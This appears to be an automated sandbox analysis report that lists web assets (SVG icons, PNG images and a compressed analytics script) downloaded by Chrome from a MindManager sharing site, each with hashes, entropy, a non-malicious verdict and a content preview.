                                                                SHA-256:106787DC80C908057A3D73A7A6C22D0721AC18EE4F17E2927C81A4D2573AEDD1
                                                                SHA-512:D5B98D17752093D7E4578EF6AEC6254E8A9CCB61D08648F7B50AC2725E5300B21A25CAAC4DBE8CF2E00580ECE674742D4AE1D6E68EE63CE28350263FA5224ADA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/top-menu-theme.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.51 15.62"><defs><style>.cls-1{fill:#eac549;stroke:#af833b;stroke-width:0.87px;}.cls-1,.cls-3{stroke-miterlimit:10;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:#b4853a;}.cls-4{fill:#cbcbca;}</style></defs><title>top-menu-theme</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M3,3.67,1.4,5.31A3.06,3.06,0,0,0,.78,8.92L3.44,6.26c-1.51,1.51-1.8,3.68-.64,4.83L6.71,15l3.83-3.83Z"/><ellipse class="cls-2" cx="8.01" cy="6.5" rx="1.9" ry="2.98" transform="translate(-2.25 7.57) rotate(-45)"/><rect class="cls-2" x="8.93" y="3.51" width="2.4" height="2.4" transform="translate(6.3 -5.79) rotate(45)"/><path class="cls-3" d="M5.42,10.59a2.57,2.57,0,0,0,.24,3.62"/><path class="cls-3" d="M6.25,12.33a1.81,1.81,0,0,0,.07,2.55"/><circle class="cls-2" cx="13.01" cy="2.5" r="2.5"/><circle class="cls-4" cx="13.51" cy="2" r="1"/><line class="cls-4" x1="3.51" y1="4.2" x2="9.51" y2="10.2"/><path class="cls
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):974
                                                                Entropy (8bit):5.0164054427932445
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3D1C9AD835BD2222DBD074FA63593828
                                                                SHA1:A2CA9A8E3E688F8A84C15484EFE83725A77B1263
                                                                SHA-256:BCD78503E3959CA6C6E77B8079DF9CF6A5C2223768B741D37B38B7B0AE3877C8
                                                                SHA-512:D6752AB58E08F94BBD81D4F202533F60DCF2F2E85EABC3C708C0AD884602EFF73D87AFBECDB7341F3BE5F543A5FCAC8B54EA68FECD133C8B412D248DA41D21B8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/topic-thumbnail/assets_magnifying_glass.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{isolation:isolate;}.cls-2{opacity:0.3;mix-blend-mode:multiply;}.cls-3{fill:#3e9eff;}.cls-4{fill:#fff;}</style></defs><title>tumbnail-image</title><g class="cls-1"><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-2" cx="12.5" cy="12.5" r="11.5"/><circle class="cls-3" cx="11.5" cy="11.5" r="11.5"/><path class="cls-4" d="M16.46,17.5h-.05l-3.69-3.7a1,1,0,0,1,.36-.71,1.1,1.1,0,0,1,.67-.36l3.75,3.7a1,1,0,0,1-.36.72A1.1,1.1,0,0,1,16.46,17.5Z"/><path class="cls-4" d="M13.64,13.27,17,16.58a2,2,0,0,1-.16.21l-.21.16-3.31-3.31a2,2,0,0,1,.16-.21l.21-.16m.11-1a1.53,1.53,0,0,0-1,.51c-.5.49-.66,1.13-.37,1.42l3.71,3.7a.55.55,0,0,0,.4.15,1.53,1.53,0,0,0,1-.51c.49-.49.66-1.13.36-1.42l-3.7-3.71a.59.59,0,0,0-.4-.14Z"/><path class="cls-4" d="M10.5,6.4A3.5,3.5,0,1,1,7,9.9a3.5,3.5,0,0,1,3.5-3.5m0-2A5.5,5.5,0,1,0,16,9.9a5.5,5.5,0,0,0-5.5-5.5Z"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):664
                                                                Entropy (8bit):5.349567846447053
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8CA29779DFB89935241FFD18721EC042
                                                                SHA1:BF9041C3D8EA5E1C4CD861917E7FC31217727AAA
                                                                SHA-256:B5B75D8FB5AF08FB78041077E0C64ED883AB45195731939731B8E7CAE7C1E0A2
                                                                SHA-512:591A6742A9AFEFB5F270F18FC55C60C131952BB22ED256B7A7A6462A3BCA0BE9D8FF464FF5C51DDFF83E86386210AC17860AF42CEED99F64D0ECA931039827A4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/RollUp/milestone.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="16px" height="16px" viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">.<rect x="3.4" y="3.4" transform="matrix(0.7071 -0.7071 0.7071 0.7071 -3.2586 7.9112)" fill="#FFFFFF" stroke="#444444" stroke-width="1.2929" stroke-miterlimit="10" width="9" height="9"/>.<polygon fill="#28559C" points="8,7.9 8,15 15,8 "/>.<polygon fill="#28559C" points="8,7.9 8,0.8 1,7.8 "/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):510
                                                                Entropy (8bit):5.19420517087356
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:032661C8695DFF0291B18C693984097B
                                                                SHA1:30D7713063129A0B454F9647C9301F11FA40A497
                                                                SHA-256:880EA6C927A4374B9FD1B7B74ACF1C0EDFF85025F9A7E26179138E0E6661CAF2
                                                                SHA-512:C7427CA85D287ED6C76CA11374AC0C45FE4FEC42D256C17A00B0A0208E1F7B2585F65F9F8A1F99E4EA54AA52C33B72CFCB03D0A753DC07ACB47B693E84A5B24D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_rows.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 13"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>Smart-Shape-Menu-Hswim</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="15" height="12"/><path class="cls-2" d="M15,1V12H1V1H15m1-1H0V13H16V0Z"/><line class="cls-3" y1="4.5" x2="15" y2="4.5"/><line class="cls-3" y1="8.5" x2="15" y2="8.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4005
                                                                Entropy (8bit):4.8251567343242465
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BC0D56E88C2618C3F9E1A29565A461FC
                                                                SHA1:A2B4D96A89E4804EDE686B12C9FFD832712167F7
                                                                SHA-256:C543FD9E218CEAC2154DA21C7A0F6E6D17B2BB3EAEA515FA689390ED9D508440
                                                                SHA-512:5DD456AC9CF0C1E5F9B62148C8C83B08A1DF04B5D9265A21DF60142567F848D8A4788EEEA77C13E44CBF434C33E5BC4AF852F0844A99AF17EEA490B52EA60907
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/projectplan.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M22.9883 25.6621H144.447C146.38 25.6621 147.947 27.2291 147.947 29.1621V39.0464H19.4883V29.1621C19.4883 27.2291 21.0553 25.6621 22.9883 25.6621Z" stroke="#83B19E"/>.<rect x="18.9883" y="32.834" width="129.459" height="6.71269" fill="white"/>.<path d="M51.9521 25.1602L51.9521 34.7497" stroke="#83B19E"/>.<path d="M116.681 25.1602L116.681 34.7497" stroke="#83B19E"/>.<path d="M84.3164 21.0586V34.2442" stroke="#83B19E"/>.<path d="M99.8352 3H68.8616C68.1285 3 67.5342 3.59431 67.5342 4.32744V19.8142C67.5342 20.5473 68.1285 21.1417 68.8616 21.1417H99.8352C100.568 21.1417 101.163 20.5473 101.163 19.8142V4.32744C101.163 3.59431 100.568 3 99.8352 3Z" fill="#617F72"/>.<path d="M99.8356 3.21875H68.8621C68.2511 3.21875 67.7559 3.71401 67.7559 4.32495V19.8117C67.7559 20.4227 68.2511 20.9179 68.8621 20.9179H99.8356C100.447 20.9179 100.942 20.4227 100.942 19.8117V4.32495C100.942 3.71401 100.447 3.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):664
                                                                Entropy (8bit):5.062584286844412
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BC8F7E70DE75A77E2DF3EC2ADB8C70FF
                                                                SHA1:85FE83C5F04FBCB89F2D1C0C4BC5D78ED2866B70
                                                                SHA-256:9D914CA4BB988BEAE2C8C6FF971F2BA42178E7A22E47FE7918917933A9D9D537
                                                                SHA-512:BC4831F2699D3319EB60B73433A5581AB6C43A6D7C456CB06C565C024E51801318D8C51CAE71330F7465740CBC3A318F7331628756502118B05E2CFF0D08469B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/padlock-locked.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#9a9aa3;}.cls-3{fill:#bc7f13;}</style></defs><title>lock_16</title><path class="cls-1" d="M0,11H16a0,0,0,0,1,0,0v3a2,2,0,0,1-2,2H2a2,2,0,0,1-2-2V11a0,0,0,0,1,0,0Z"/><path class="cls-2" d="M2,7H14a2,2,0,0,1,2,2v1a0,0,0,0,1,0,0H0a0,0,0,0,1,0,0V9A2,2,0,0,1,2,7Z"/><circle class="cls-3" cx="8.5" cy="12.5" r="1.5"/><rect class="cls-3" x="8" y="12" width="1" height="3" rx="0.5" ry="0.5"/><path class="cls-2" d="M6,7V3.5A1.5,1.5,0,0,1,7.5,2h1A1.5,1.5,0,0,1,10,3.5V7h2V3.5A3.52,3.52,0,0,0,8.5,0h-1A3.52,3.52,0,0,0,4,3.5V7Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1247
                                                                Entropy (8bit):4.9214129688000225
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4538476927038F65C8F47C295CA0B5E5
                                                                SHA1:ECE1BBB91E4AEC4BF72A0F61878C276C950FB8B6
                                                                SHA-256:CC84E4B2594539D50AAEA79F495FAC4705A2385DC8ECE0DF2B04C7599B9BA1E3
                                                                SHA-512:77395274ED067FEFBC530DF5266AF71791151B6612F249E06A076910EA276C8F8743D6B6790650E57383342BE7C3C5B57A3769D3D94B5A007A9F0CCF3061E725
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_date.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#f2a650;}</style></defs><title>topic_info_icon_date</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="1.71"/><path class="cls-2" d="M13.79,1A1.21,1.21,0,0,1,15,2.21V13.79A1.21,1.21,0,0,1,13.79,15H2.21A1.21,1.21,0,0,1,1,13.79V2.21A1.21,1.21,0,0,1,2.21,1H13.79m0-1H2.21A2.21,2.21,0,0,0,0,2.21V13.79A2.21,2.21,0,0,0,2.21,16H13.79A2.21,2.21,0,0,0,16,13.79V2.21A2.21,2.21,0,0,0,13.79,0Z"/><path class="cls-2" d="M8,13H4v-.8L5.17,11c.35-.36.58-.61.69-.74a1.46,1.46,0,0,0,.22-.34.66.66,0,0,0,.07-.3A.37.37,0,0,0,6,9.28a.49.49,0,0,0-.36-.11,1,1,0,0,0-.48.13,3.08,3.08,0,0,0-.54.4l-.75-.87a4.37,4.37,0,0,1,.65-.49,2.7,2.7,0,0,1,.58-.23A3,3,0,0,1,5.82,8a2,2,0,0,1,.87.17,1.34,1.34,0,0,1,.59.48,1.26,1.26,0,0,1,.21.71,1.86,1.86,0,0,1-.07.54,1.68,1.68,0,0,1-.23.49,3.39,3.39,0,0,1-.41.51c-.17.17-.78,1-.78,1V12H8Z"/><path class="cls-2" d=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):291
                                                                Entropy (8bit):6.714239975273976
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:141DB5307504121048C0183A11D3F192
                                                                SHA1:8E87A2C03E753660AEA45E30638D7C009E637994
                                                                SHA-256:8EC83CAE5CBA23559F2D4FFD5366736CF68BF45750397CE8AF0122FDC6B0B0DD
                                                                SHA-512:E473FAA7075CEEA948F8E02A4AF47FB28E98CA9E1DECBB1E33B68295929F832738868031BC2DB2F2298E2C3108621CFC599DFD7A142A52FA5C75FF2B0986A731
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-right-selected.png
                                                                Preview:.PNG........IHDR...3...0......5B.....pHYs.................tIME....... .......IDATh....@@.D{..$.. .I.K..0.J...+...}...o.0w...M...3.....;5.>.8.)@..@..&,.f...tj...`..S.}0...W..X.=.....=..`..!.S....^3..F0..q.p.f..F.3.>@.3...4;sZ4.....Z.`...y?.-..gSt].Y@$..D.ah..Yd5/.v`.E.......IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1698
                                                                Entropy (8bit):4.678719075376623
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CCCE27CFA71635A55E2878A2ADD22EB8
                                                                SHA1:F70D1AEA98556DE148E8D924E480EEC100736096
                                                                SHA-256:FF5F6BFEF0FD896A0CEC61B96634CCE0032D53168EA9537884E1CDF204420161
                                                                SHA-512:5F1C60362171FB596282FB03B6DAC771F9624ED21DF80C08E4E17D3FC4B9BAC38444C0DCC9B4CDAB35721A62A49EB2C6CF2909B5D2DF8CC4E409380E0A5B8302
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/overlay-panel/status-editing.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.23 19.18"><defs><style>.cls-1{fill:#d0f4d0;}.cls-2{fill:#29a535;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M8.49,12.4a1,1,0,0,1-.71-.3l-.71-.7a1,1,0,0,1,0-1.42L16.26.79a1,1,0,0,1,1.42,0l.71.71a1,1,0,0,1,0,1.41L9.19,12.1A1,1,0,0,1,8.49,12.4Z"/><path class="cls-2" d="M17,1a.5.5,0,0,1,.35.14l.71.71a.51.51,0,0,1,0,.71L8.84,11.75a.5.5,0,0,1-.71,0L7.42,11a.5.5,0,0,1,0-.7l9.2-9.2A.5.5,0,0,1,17,1m0-1a1.51,1.51,0,0,0-1.06.44L6.72,9.63a1.49,1.49,0,0,0,0,2.12l.7.71a1.51,1.51,0,0,0,2.13,0l9.19-9.19a1.52,1.52,0,0,0,0-2.13L18,.44A1.49,1.49,0,0,0,17,0Z"/><rect class="cls-2" x="15.82" y="-0.15" width="3" height="4" rx="1.5" transform="translate(3.76 12.79) rotate(-45)"/><path class="cls-1" d="M.76,18.41a15.17,15.17,0,0,1,1.45-3.57l8.9-8.9A1.22,1.22,0,0,1,12,5.61a1.65,1.65,0,0,1,1.12.48,1.6,1.6,0,0,1,.48,1,1.15,1.15,0,0,1-.32.92l-8.8,8.8A16.64,16.64,0,0,1,.76,18.41Z"/><path clas
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):732
                                                                Entropy (8bit):5.227758309794616
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:10952F59876C6A579CF25F67EF6927EA
                                                                SHA1:718FD84FA93A42C91AD7F5A8573CEEF80576A8ED
                                                                SHA-256:03B6CE543F84E0833985B29BA8314E1E6579CA6326EA237458F0E4C12AAD2CD9
                                                                SHA-512:A6A0A66B78FAF6964382BA29E7E1BC644D01F0D0EC6707B9F9F118A1BDA962C71D5E01EFD8C7D676B602DEED4CC71C8ECACA294CEB6A9DBF9A6D8039B9044FDF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_callout.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 23"><defs><style>.cls-1{fill:#96be7d;stroke:#63a558;stroke-miterlimit:10;}.cls-2{fill:#63a558;}.cls-3{fill:#fff;}</style></defs><title>web app toolbar assets add callout</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="23" height="18" rx="4"/><polygon class="cls-2" points="18 23 18 19 12 19 18 23"/><polygon class="cls-3" points="10.5 12.5 10.5 10.5 8.5 10.5 8.5 7.5 10.5 7.5 10.5 5.5 13.5 5.5 13.5 7.5 15.5 7.5 15.5 10.5 13.5 10.5 13.5 12.5 10.5 12.5"/><path class="cls-2" d="M13,6V8h2v2H13v2H11V10H9V8h2V6h2m1-1H10V7H8v4h2v2h4V11h2V7H14V5Z"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):5194
                                                                Entropy (8bit):3.976628767895142
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:63E737D3544164D2B7F4FBCA416AC807
                                                                SHA1:030370AA38715E4C41589633F69D0BFE8255D46C
                                                                SHA-256:5FA00D047ACD959697B9D7772C31DCD37BEC33C70C6FBF80AB8316205D1D286D
                                                                SHA-512:31EE1BB536C0E50F5568A415EA3308367BFCFD11D2A6F7DFF1C8E3A982F7BE790C240A603CD4C6E187672824B8E5D07646049A28C6A88A7B001EB9A0142F312B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83 0 01.74.77 2.25 2.25 0 01.25 1.07 2.26 2.26 0 01-.25 1.08 1.77 1.77 0 01-.74.77 2.55 2.55 0 01-1.28.29H.66v-.72h1.59a1.81 1.81 0 00.87-.19 1.1 1.1 0 00.48-.5 1.73 1.73 0 00.15-.73A1.66 1.66 0 003.6 7a1.1 1.1 0 00-.48-.5 1.86 1.86 0 00-.88-.18H.81v6zm7.74.1a2.29 2.29 0 01-1.2-.32 2.29 2.29 0 01-.8-.91 3.06 3.06 0 01-.28-1.36 3.07 3.07 0 01.28-1.37 2.14 2.14 0 012-1.24 2.14 2.14 0 012 1.24A3.07 3.07 0 0110 9.81a3.06 3.06 0 01-.29 1.36 2.11 2.11 0 01-2 1.23zm0-.69a1.31 1.31 0 00.85-.27 1.6 1.6 0 00.5-.69 2.9 2.9 0 00.16-.94 2.85 2.85 0 00-.16-.94 1.67 1.67 0 00-.5-.71 1.37 1.37 0 00-.85-.26 1.35 1.35 0 00-.85.26 1.67 1.67 0 00-.5.71 2.85 2.85 0 00-.16.94 2.9 2.9 0 00.16.94 1.6 1.6 0 00.5.69 1.29 1.29 0 00.85.27zm4.43.59l-1.54-5h.82l1.08 3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, last modified: Fri Jul 30 21:44:02 2021, from Unix, original size modulo 2^32 68248
                                                                Category:downloaded
                                                                Size (bytes):21787
                                                                Entropy (8bit):7.991764342861689
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:7A2A8B3CB7EAE6B25EF98F57A18A9E68
                                                                SHA1:DB5577B189DB919A1BEB7A3073EA1A83508E7184
                                                                SHA-256:BE01A753FD60ABEB6041486510A8EB3FDD4A2AC538FC0DBCBF6836342D5F3855
                                                                SHA-512:B2F6176CBD844F8F826D390E7F7CBF5B93A922240854792F777C646D813D6D10595DB8F9518269BC58F774835E07C60E833D411CC9C4B09617E827E583510308
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.amplitude.com/libs/amplitude-8.4.0-min.gz.js
                                                                Preview:.....r.a...:.s......v.T.*..*|e.MRZ.\>.$...p.J@G..mj.........L....f<F...[........b9.E<e.6.&..e?.q.H..D...n...O!.q.X....T.........K%3...../X.....R...d..`....c...m<....~.<;......on....m..-F..t.C.....J-8...3qW..e...>..`T........9......J|d...j..B.{o.3.uJ%.w.B_.1.tn>..p.....u.,.+`.w>....M.e.\. ...$Y.9..<..d,..O.?|O.....Q...;.r.a.Zcg^8.......DF........C6.._...f..1...V.h.1c...$..4.........0..s.......+.y..I./..,......mP....M..Z.0.....{.((.a~..<..j...r.H..,......d.....k.,y...|.:C.....f....v.$...D6.\..jZ]#PG..t79...K.3g....^T}.m........].....>.i.!|....D......Ka.nD.yS#.......|F..&....F.!.$"...f1....^.O..#&L..e.i.7...s.....7....f[./.,...nS....m^u. ..-.=.x.v...+L`..G.tz.l.G".....q.Y<.l6....%.'s...$VD9..5|.0r.<`.2.&>.$......L>)._^..#....a....=..~..1..'.;..S...j...$....0......."....u=.......,........j.i..K..K.....s.!.V;..(.........V'..hS...<.....J.B.`g.J}..........2.T.5l.W.$....t..p.(..I".M.K$.....e....?..R..W PY.+..5.^...PW.zs.|"....K2..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):486
                                                                Entropy (8bit):5.009129775774674
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EAE30FF2003CD1214577BB88AAD87E04
                                                                SHA1:6129D866EA89E8FD0C4519D4B4182A13D92A0DEC
                                                                SHA-256:0A1C47B33403BD32834E5911D07AD28FB492212DE4DE6F7B60B65E052350487D
                                                                SHA-512:7E194F2E6AD6028CF80AE89964E04C0D99A1D417553B32A4893ECACC37E3B9FF5FB89850ED251F71ADE45985F05B9E471DEB999AA5A86BF861AD4D179C521B24
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-green.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;}.cls-2{opacity:0.2;}</style></defs><title>flag_green_16 copy</title><rect class="cls-1" x="1" width="1" height="16" rx="0.5" ry="0.5"/><polygon class="cls-1" points="8 11 8 4.5 16 7.75 8 11"/><polygon class="cls-1" points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-2" x="7" y="3" width="1" height="6"/><rect width="1" height="16" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):846
                                                                Entropy (8bit):5.136825577135297
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AA92A651A154F01270B67B18D58EEE9B
                                                                SHA1:9EC777F00A6DF7791D03513C9348ADD49BD18104
                                                                SHA-256:95660F4BE97DC1F6B09552BB89ADB3F122E82A343760806426B6CFC768725396
                                                                SHA-512:A234E5623840E35797CED45F75A8873FD46A353072D289DE24CF3F5587D244D418B5D06B10B45979D86528E4BCC3C6D6DF5FB89E6F6B0EC6C3F8C35138471B86
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/local_files.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 34 31"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#3a52a4;}.cls-3{fill:#e4ebf1;}.cls-4{fill:gray;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.73" y="0.73" width="32.54" height="21.54" rx="1.27"/><path class="cls-2" d="M32,1.46a.55.55,0,0,1,.54.54V21a.55.55,0,0,1-.54.54H2A.55.55,0,0,1,1.46,21V2A.55.55,0,0,1,2,1.46H32M32,0H2A2,2,0,0,0,0,2V21a2,2,0,0,0,2,2H32a2,2,0,0,0,2-2V2a2,2,0,0,0-2-2Z"/><rect class="cls-3" x="3" y="3" width="28" height="17" rx="1"/><rect class="cls-2" x="15.5" y="23.5" width="3" height="7"/><path class="cls-2" d="M18,24v6H16V24h2m1-1H15v8h4V23Z"/><rect class="cls-4" x="5" y="30" width="25" height="1" rx="0.5"/><path class="cls-2" d="M29.5,30H5.5a.5.5,0,0,0,0,1h24a.5.5,0,0,0,0-1Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 53 x 36, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1200
                                                                Entropy (8bit):7.738876170799627
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:92037C8BE0148D9E3C557EB3DE22368B
                                                                SHA1:ECDA16D57B2C36B66852B279799EAD087001A198
                                                                SHA-256:248A5053411FC6C9A77C85B06632A96BF91302BE02EE07AFD88215C0D9D454A1
                                                                SHA-512:25CC2B04913AAF6E4CBB63FB087E598682356BD37CA2EFC0986D9E375D7AF0CBB05BCC8BB5C94912E16BDD86B6DE6E19287A1DBBC820D78CC57FD621412C4D2F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-ellipse.png
                                                                Preview:.PNG........IHDR...5...$.....)lrN....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<...=IDATx..OH.Q.._.5.XAP....z.P....J..".....9."..j.zh+XHC.....K..zP..x.P(z..J..`.h......&q......n6Kx..7.f..2..(.....qi.....;./kC.8.....\).`;+. n..n.w.R...kkk.+++".Lf.....W:...[...t..P.QU.....-.........Q....+G>YZZ..DB..C......3.F..U.(.p....G..E>....p....t.d..,.....A.$...i..LA..(J.....z.%..%....5Z...U4......M].a...D..P........r...).....y....$LOO.8o..&''.`..`~.P....1.300 ..Z...`....J...{O.....4..}F......M.B...y...X.7.`..%g. .....@W..CY-...Xss....Y.....?f).. ................B..<.........&....6Qn.......z{{....-AK..-%y.p8Dww...P.....Z.?..U"C(.. t.&.V....b..G..B6...9.M.0.....ie.....pA....J...].......V.>..>..A*..J.o...........M..u.......b{{.lP..*K.[Ekz|b.d.%..#UJ.x.P.t......(...bX...,=..|af...)G>I.Rr..34C.}iddDlnn..w..R....`.....FGG.:..n..ZJ..m..B.h.b.......x...PK......|.<.......U.iP..pX....`0x.L.E...a.XM....\D.I.Nk.y.cQ60..`.y....SSS......>...6."3.5.............b"..J+A
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 34 x 22, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):364
                                                                Entropy (8bit):6.904718323071714
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CD64908DDFB22BF68B21BEED238F6D4F
                                                                SHA1:1749FA211D4D949231A106F7D077B977EDBFD301
                                                                SHA-256:20712856EA9B2CCFAD55B98A90D66A47225C29E40EA52988F93C704D1C92452F
                                                                SHA-512:990EA848D6BEAB33BD2BDB57217C364BBA426A3E21E3735A92F5BAC7AB084DD80CF99B07D892383D5E82BBAD64D86255D7870D7158D86BAFB3A05902DBCCD57F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-line-curved.png
                                                                Preview:.PNG........IHDR..."...........Ny....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx......0...b:....:..T6.6`.7p.;.a...Gp...~.j....8......k..u-...T.am.[TEQ.#J.6O0...$.....%b9...G*pq8.\ND..Mo.f.Sb..u=I.x sl.C.D.k{.@.C+....7...../.....2D.N..A.{...B8U.h.#.D.B.....0....p#.. Rn... N.7..!Lw.xA.....`.gEl.-...5..3..}..D#..W.{..^2.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):7390
                                                                Entropy (8bit):4.02755241095864
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
